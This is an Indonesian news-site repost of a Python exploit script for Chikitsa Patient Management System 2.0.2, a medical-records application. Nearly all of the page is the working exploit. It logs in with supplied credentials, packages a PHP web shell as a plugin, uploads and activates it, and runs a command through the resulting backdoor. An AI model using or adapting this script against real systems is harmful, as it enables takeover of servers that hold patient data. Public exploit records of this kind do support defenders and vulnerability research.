Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Plugin

  • Whatsapp
Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Plugin
Sistem Manajemen Pasien Chikitsa Eksekusi Kode Jarak Jauh Plugin

News.nextcloud.asia

Sistem Manajemen Pasien Chikitsa versi 2.0.2 mengalami kerentanan eksekusi kode jarak jauh yang diautentikasi terkait plugin.

MD5 | ef6db80175b703f905621cde401d57b9

# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu

import requests
import os
import argparse

def login(session , target , username , password):
print("[+] Attempting to login with the credential")
url = target + "/index.php/login/valid_signin"
login_data = {"username" : username , "password" : password}
session.post(url , data=login_data , verify=False)
return session

def generate_plugin():
print("[+] Generating a malicious plugin")
global tmp_dir
tmp_dir = os.popen("mktemp -d").read().rstrip()
open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()

def upload_plugin(session , target):
print("[+] Uploading the plugin into the server.")
url = target + "/index.php/module/upload_module/"
file = open(f"{tmp_dir}/rce.zip" , "rb").read()
session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})
session.get(target + "/index.php/module/activate_module/rce" , verify=False)
print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")
print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")

def main():
parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ / / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
___/_/ /_/_/_/|_/_/__/____/__,_/

Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution :
POC Written By - 0z09e (https://twitter.com/0z09e)nn""" , formatter_class=argparse.RawTextHelpFormatter)
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
req_args.add_argument("-u" , "--username" , help="Username" , required=True)
req_args.add_argument("-p" , "--password" , help="password", required=True)
args = parser.parse_args()

target = args.URL
if target[-1] == "/":
target = target[:-1]
username = args.username
password = args.password

session = requests.session()
login(session , target , username , password)
generate_plugin()
upload_plugin(session , target)

if __name__ == "__main__":
main()

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.